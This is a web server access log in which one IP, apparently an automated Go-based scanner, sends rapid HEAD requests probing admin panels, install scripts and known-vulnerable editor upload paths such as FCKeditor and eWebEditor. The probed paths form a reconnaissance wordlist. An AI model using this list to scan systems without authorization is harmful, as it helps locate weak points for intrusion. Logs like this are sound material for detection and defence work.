121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /newbbs HTTP/1.1" 499 0 "http://www.cqqizhou.com/newbbs" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /tmp HTTP/1.1" 499 0 "http://www.cqqizhou.com/tmp" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /Editor HTTP/1.1" 499 0 "http://www.cqqizhou.com/Editor" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /adminweb HTTP/1.1" 499 0 "http://www.cqqizhou.com/adminweb" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /FCKeditor/editor HTTP/1.1" 499 0 "http://www.cqqizhou.com/FCKeditor/editor" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /webadmin HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /Editor/Include HTTP/1.1" 499 0 "http://www.cqqizhou.com/Editor/Include" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /dede HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /admin/daili/webedit HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/daili/webedit" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:01 +0800] "HEAD /PayOnline HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:03 +0800] "HEAD /upload/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:03 +0800] "HEAD /s_admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /setup HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /system/eWebEditor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /syssite/install HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /aspnet_client/system_web HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /eWebEditorNet/UploadFile HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /admin/editor/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /admin/editor/UploadFile HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:04 +0800] "HEAD /edit/SysImage HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /admin/editor/db HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /intraAdmin/phpmyadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /Webedit/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /admin888 HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /admin/editor/include HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /boke/Edit_Plus/FCKeditor/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /aspcheck HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /fund HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /mdb HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /intraAdmin/class HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /fckEditor/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /database/web/Base HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /edit/db HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.252.229 - - [29/Aug/2025:14:01:05 +0800] "HEAD /shsjms HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
